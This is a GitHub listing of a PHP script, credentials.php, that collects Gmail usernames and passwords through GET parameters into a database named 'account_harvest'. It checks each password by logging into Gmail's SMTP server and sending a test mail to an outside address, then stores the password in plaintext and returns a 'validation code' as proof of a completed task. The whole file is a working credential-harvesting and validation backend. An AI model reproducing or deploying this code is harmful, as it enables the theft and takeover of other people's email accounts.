-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathcredentials.php
106 lines (91 loc) · 4.34 KB
/
credentials.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
<?php
require_once 'swiftmailer/lib/swift_required.php';
$DATABASE_HOST = 'localhost';
$DATABASE_USERNAME = 'ENTER_DATABASE_USERNAME_HERE';
$DATABASE_PASSWORD = 'ENTER_DATABASE_PASSWORD_HERE';
$DATABASE = 'account_harvest';
$TABLE = 'harvest';
function endsWith($haystack, $needle)
{
return $needle === "" || substr($haystack, -strlen($needle)) === $needle;
}
$response = array(
"success" => false,
"message" => "An unknown error occurred."
);
if (isset($_GET["first_name"]) && isset($_GET["last_name"]) && isset($_GET["username"]) && isset($_GET["password"])) {
$firstName = trim($_GET["first_name"]);
$lastName = trim($_GET["last_name"]);
$username = trim($_GET["username"]);
if (!endsWith($username, '@gmail.com')) {
$username = $username . '@gmail.com';
}
$password = trim($_GET["password"]);
// check input against creds in database
try {
$checkconnection = @mysql_connect($DATABASE_HOST, $DATABASE_USERNAME, $DATABASE_PASSWORD);
if (!$checkconnection) {
$response = array(
"success" => false,
"message" => "Could not connect to database, please try again in a few minutes."
);
} else {
// select and create the table if its not already there
mysql_select_db($DATABASE);
$createDBIfNotExistsSQL = "CREATE TABLE IF NOT EXISTS $TABLE (id INTEGER NOT NULL AUTO_INCREMENT, first_name TEXT, last_name TEXT, username TEXT, password TEXT, validation_code TEXT, PRIMARY KEY (Id));";
mysql_query($createDBIfNotExistsSQL);
// check if we have seen this credentials before
$selectUsernameSQL = "SELECT id FROM $DATABASE.$TABLE where username='" . mysql_real_escape_string($username) . "';";
$selectUsernameResult = mysql_query($selectUsernameSQL);
if (mysql_num_rows($selectUsernameResult) > 0) {
$response = array(
"success" => false,
"message" => "These credentials have already been submitted."
);
} else {
// validate credentials
try {
$transport = Swift_SmtpTransport::newInstance('smtp.gmail.com', 465, "ssl")
->setUsername($username)
->setPassword($password);
$mailer = Swift_Mailer::newInstance($transport);
// need to send an actual email to test authentication
$message = Swift_Message::newInstance('Hello')
->setFrom(array($username => ($firstName . " " . $lastName)))
->setTo(array('robert@sharklasers.com'))
->setBody('This is a test mail.');
$result = $mailer->send($message);
// no exceptions at this point so the credentials must be good
$validationCode = sha1("salty" . $username);
$insertSQL = "INSERT INTO $DATABASE.$TABLE (first_name,last_name,username,password,validation_code) VALUES ('" . mysql_real_escape_string($firstName) . "','" . mysql_real_escape_string($lastName) . "','" . mysql_real_escape_string($username) . "','" . mysql_real_escape_string($password) . "','" . mysql_real_escape_string($validationCode) . "');";
mysql_query($insertSQL);
$response = array(
"success" => true,
"message" => "Task completed successfully!",
"validation_code" => $validationCode
);
}
catch (Exception $e1) {
// echo 'Caught exception: ', $e->getMessage(), "\n";
$response = array(
"success" => false,
"message" => "Could not validate credentials."
);
}
}
}
}
catch (Exception $e2) {
$response = array(
"success" => false,
"message" => "Could not save credentials, please try again in a few minutes."
);
}
} else {
$response = array(
"success" => false,
"message" => "Required fields (first name, last name, username, password) are missing."
);
}
echo json_encode($response);
?>